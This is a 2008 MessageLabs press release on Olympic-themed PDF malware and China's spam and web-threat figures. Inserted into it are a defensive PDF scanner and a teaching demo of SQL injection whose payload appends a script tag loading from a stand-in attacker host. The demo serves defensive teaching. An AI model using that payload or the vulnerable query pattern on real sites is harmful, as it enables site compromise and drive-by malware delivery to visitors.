Olympic Targeted Attacks Hidden in PDFs


SYDNEY, Australia – August 13, 2008 - MessageLabs has uncovered evidence of targeted malware being distributed in legitimate-looking International Olympic Committee (IOC) emails that have been sent to participating nations' national sporting organisations and athlete representatives.

In this latest attack, at least 9 domains were targeted with 57 emails containing press release and media information relating to the International Olympic Committee. The content of the messages appears to have been taken from the IOC website. A sample of one of the emails accompanied the original release.

The malware was hidden within an Adobe Acrobat PDF attachment, which used embedded JavaScript to drop a malicious executable onto the target's computer. The executable compromises the machine, allowing confidential information to be leaked to an external party. Although the initial PDF is blank when opened, the dropped executable then presents the user with a non-blank PDF containing information similar to the press release in the email body, convincing the user that the attachment is genuine. Most traditional signature-based anti-virus systems are unable to detect and stop targeted attacks of this kind. The original emails appear to have come from a number of Google Mail accounts, including international.olympic@gmail.com and international.olympic2008@gmail.com.
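The dropper described above relies on PDF features that a mail gateway can look for before delivery: an action that fires when the document opens, JavaScript to carry the logic, and something to launch or embed. The following is an added example, not MessageLabs' code and not taken from the release: a small Python triage scanner that counts those names, undoes the `#xx` hex escapes that PDF permits inside names (a common way to hide `/JavaScript` from plain byte matching), and inflates FlateDecode streams so that names tucked inside object streams are scanned too. Both sample PDFs are constructed inline for the demonstration; the JavaScript body is a placeholder, not the real dropper.

```python
import re
import zlib
from typing import Dict

# Names that appear in the kind of PDF dropper described in the release:
# an action that fires on open, JavaScript to run, and a payload to drop.
SUSPICIOUS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
              b"/EmbeddedFile", b"/RichMedia", b"/ObjStm"]
# /OpenAction and /AA on their own are common in benign files (jump to a
# page on open), so only these names push the verdict to "suspicious".
STRONG = {"/JavaScript", "/JS", "/Launch", "/EmbeddedFile", "/RichMedia"}

_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
_STREAM = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def normalise_names(data: bytes) -> bytes:
    """Undo #xx escapes in name objects (/J#61vaScript -> /JavaScript),
    which malware authors use to dodge plain byte matching."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Concatenate every stream body that inflates with zlib, so names hidden
    inside FlateDecode'd (object) streams are scanned as well."""
    out = b""
    for m in _STREAM.finditer(data):
        try:
            out += zlib.decompress(m.group(1)) + b"\n"
        except zlib.error:
            continue  # not Flate-encoded; other filters are out of scope here
    return out


def scan_pdf(data: bytes) -> Dict[str, int]:
    """Count suspicious names in the raw file plus its inflated streams."""
    if not data.lstrip().startswith(b"%PDF"):
        raise ValueError("missing %PDF header")
    haystack = normalise_names(data) + normalise_names(inflate_streams(data))
    hits: Dict[str, int] = {}
    for name in SUSPICIOUS:
        # A name ends at a delimiter, so /JS must not also count /JSxyz.
        pattern = re.escape(name) + rb"(?![0-9A-Za-z])"
        count = len(re.findall(pattern, haystack))
        if count:
            hits[name.decode()] = count
    return hits


def is_suspicious(hits: Dict[str, int]) -> bool:
    """True only when a name from STRONG is present, not for /OpenAction alone."""
    return bool(STRONG & hits.keys())


# Constructed sample 1: a harmless one-page PDF that simply opens on page 1.
BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction [3 0 R /Fit] >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)


def build_dropper_like_pdf() -> bytes:
    """Constructed sample 2: a blank page whose /OpenAction points at a
    JavaScript action. The action object is hex-escaped and tucked inside a
    FlateDecode'd object stream, so a plain grep for /JavaScript misses it.
    The script body is a placeholder, not the real dropper."""
    hidden = zlib.compress(
        b"4 0 obj << /S /J#61vaScript /JS (app.alert('dropper placeholder')) >> endobj"
    )
    return (
        b"%PDF-1.4\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
        b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
        b"5 0 obj << /Type /ObjStm /Filter /FlateDecode /Length "
        + str(len(hidden)).encode() + b" >>\nstream\n" + hidden
        + b"\nendstream\nendobj\n"
        b"trailer << /Root 1 0 R >>\n%%EOF\n"
    )


if __name__ == "__main__":
    for label, pdf in (("benign", BENIGN_PDF), ("dropper-like", build_dropper_like_pdf())):
        hits = scan_pdf(pdf)
        print(f"{label}: {hits} -> {'SUSPICIOUS' if is_suspicious(hits) else 'ok'}")
```

This is a triage filter, not a parser: it will flag the hex-escaped, stream-hidden sample while letting the benign `/OpenAction` file through, but a deliberately malformed PDF that Acrobat still renders (other filters, broken object tables, cross-reference tricks) can evade a byte-level check, which is the same limitation the release points out for signature-based anti-virus.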


Beyond the initial direct distribution, because the email and its attachment appeared legitimate to many recipients, it was subsequently and innocently forwarded on to other news and sporting organisations.

Worldwide interest in the Beijing Olympic Games is now reaching a high point, and MessageLabs expects to intercept further targeted attacks as well as more general malware distribution that simply capitalises on interest in the Olympics. A variety of such Olympic-themed malware has been intercepted by MessageLabs in recent weeks, including emails carrying malicious attachments as well as web links to malware-hosting sites. Examples of Olympic-themed subject lines include the following:
Beijing Olympics cancelled, moved to Atlanta
Emailing: Beijing takes dog off the menu for Olympics - Yahoo! News
Obama buys 10 million Olympics ad
2008 Olympic Games will possible not take place
Athletes ponder wearing masks to fight pollution - Olympics - Yahoo! Sports
2008 Olympic Games are under the threat
FW: Learn Chinese for the Olympics

The online threat landscape and China
Broadband adoption in China reportedly exceeded that in the US earlier this year, with more than 71.6 million subscribers compared with 70.2 million in the US, 21 million in Germany and 16.4 million in the UK (according to DITTBERNER, June 2008).

The China Internet Network Information Centre (CNNIC) reported that the country had more than 253 million Internet users at the end of June. It is believed that China now has more web surfers than the US. Also, with 12.18 million '.cn' domain names in circulation, China can now boast the largest country-code top-level domain, next to Germany (.de).

The majority of the 12 million .cn domains are registered overseas. The domain is favoured by malware authors and spammers alike, partly because aggressive price reductions have made it one of the least expensive domains to own, and partly because a malicious site hosted in China is much harder to close down. With the world's eyes focusing on the Olympic Games in Beijing, this booming marketplace is expected to become an increasingly attractive target for cybercriminals.

Web Threats in China
With China's huge growth in Internet users and broadband adoption, and the increased demand for .cn domains, China is now an attractive target for cybercriminals. It is interesting to note that there are 1.92 million websites hosted in China (according to CNNIC), 71.3% of them under the .cn country-code top-level domain.

Analysis of MessageLabs Web Security activity during July 2008 identified that 4.4% of all web-based malware was hosted on .cn domains, making it the third most popular domain globally behind .com and .mobi (a chart accompanied the original release).

The majority of malicious web security threats in July resulted from a recent rise in the number of legitimate sites being compromised through SQL injection attacks. Many of these attacks were also hosted on .cn domains in July. For more information on this topic, please refer to the MessageLabs Intelligence Report for July 2008 (http://www.messagelabs.com/intelligence.aspx).
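The compromise path mentioned above, SQL injection used to turn a legitimate site into a malware host, is easy to see in miniature. The following added example is not MessageLabs' code, and the release does not describe the actual payloads used; it uses Python's sqlite3 to show a hit-counter query built by string concatenation, a stacked-statement payload that appends a script tag to every page in the site, and the parameterised, type-checked version that refuses it. The table, column and host names are assumed for the demonstration, and `executescript` stands in for a database driver that accepts several statements per call (sqlite3's `execute` does not, which is one of the reasons the hardened version is safe).

```python
import sqlite3
from typing import List

# Constructed sample: the content table of a small, legitimate club website.
SCHEMA = """
CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT,
                    hits INTEGER NOT NULL DEFAULT 0);
INSERT INTO pages (id, title, body) VALUES (1, 'Home',    '<p>Welcome to the club.</p>');
INSERT INTO pages (id, title, body) VALUES (2, 'Results', '<p>Latest results.</p>');
"""

# Assumed payload: the kind of tag a drive-by campaign appends to every page so
# visitors fetch a script from an attacker-controlled host (placeholder name).
INJECTED_TAG = '<script src="http://malware.example/x.js"></script>'
# Request parameter that closes the intended statement and stacks a second one.
PAYLOAD = f"1; UPDATE pages SET body = body || '{INJECTED_TAG}'"


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def count_visit_vulnerable(conn: sqlite3.Connection, page_id: str) -> None:
    """Concatenates the request parameter into SQL and runs it as a script.
    executescript() stands in for a driver that accepts stacked statements,
    which is what lets 'UPDATE ...; UPDATE ...' through."""
    conn.executescript(f"UPDATE pages SET hits = hits + 1 WHERE id = {page_id}")


def count_visit_hardened(conn: sqlite3.Connection, page_id: str) -> None:
    """Validates the type and binds the value as a parameter. int() rejects
    the payload outright; even without it, the bound value is data, never SQL,
    and execute() refuses more than one statement."""
    pid = int(page_id)
    conn.execute("UPDATE pages SET hits = hits + 1 WHERE id = ?", (pid,))
    conn.commit()


def infected_pages(conn: sqlite3.Connection) -> List[int]:
    """IDs of pages whose stored body now carries a script tag."""
    rows = conn.execute(
        "SELECT id FROM pages WHERE body LIKE '%<script%' ORDER BY id"
    ).fetchall()
    return [r[0] for r in rows]


def hits_for(conn: sqlite3.Connection, page_id: int) -> int:
    return conn.execute("SELECT hits FROM pages WHERE id = ?", (page_id,)).fetchone()[0]


if __name__ == "__main__":
    db = fresh_db()
    count_visit_vulnerable(db, PAYLOAD)
    print("vulnerable handler, pages now serving the injected script:", infected_pages(db))

    db = fresh_db()
    try:
        count_visit_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("hardened handler rejected the request:", exc)
    print("hardened handler, infected pages:", infected_pages(db))
```

The point for an incident responder is the symptom: after one request to the vulnerable handler every row's body ends in the attacker's tag, which is why mass SQL injection shows up as thousands of unrelated legitimate sites suddenly loading the same external script.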

Spam in China
Internet use in China has grown significantly in recent months, giving users access to the very latest information such as breaking news stories online, as well as increasing use of online shopping and online banking. Although email in China takes second place to instant messaging, with 81% of Chinese Internet users favouring IM compared with 56% who use email (according to CNNIC in January 2008), this does not dissuade the spammers. At 72.9% of all email, spam in China compares with 79.8% in the US, 69.9% in the UK and 64.1% in Australia. Spam levels in China have increased in recent months (a chart accompanied the original release).

As in the example below, more spam is now targeting Chinese domains and is written in Chinese rather than in English, the ubiquitous language of spam. During the first half of 2008, approximately 0.03% of all spam worldwide was in Chinese. Interestingly, less than 1% of global spam actually emanates from China.

In the Chinese spam example that accompanied the original release, the sender's company purportedly has a presence in different parts of China and has extra invoices for sales, transportation, advertising, construction and so on. Anyone who needs invoices (e.g. for their tax bill) is invited to contact them.

Email Malware in China
Email-borne malware targeting Chinese businesses peaked in July 2007, when 2.26% of emails (1 in every 44.2) carried some form of malware. Since the end of last year the level of email threats has diminished. In 2007 the malware landscape in China was dominated by mass-mailers such as Warezov, which also included an IM component used to spread itself. By July 2008 only 0.07% of emails (1 in 1,428) were malicious. This decline is largely due to the dwindling of mass-mailing email viruses, Warezov included, coupled with the shift from spreading malware via email to spreading it via drive-by downloads on websites compromised for the purpose. A graph of this trend accompanied the original release.

About MessageLabs
MessageLabs is a leading provider of integrated messaging and web security services, with over 18,000 clients ranging from small businesses to the Fortune 500, located in more than 86 countries. MessageLabs provides a range of managed security services to protect, control, encrypt and archive communications across email, web and instant messaging.

These services are delivered by MessageLabs' globally distributed infrastructure and supported 24/7 by security experts. This provides a convenient and cost-effective solution for managing and reducing risk and providing certainty in the exchange of business information. For more information, please visit www.messagelabs.com.


ENDS

© Scoop Media
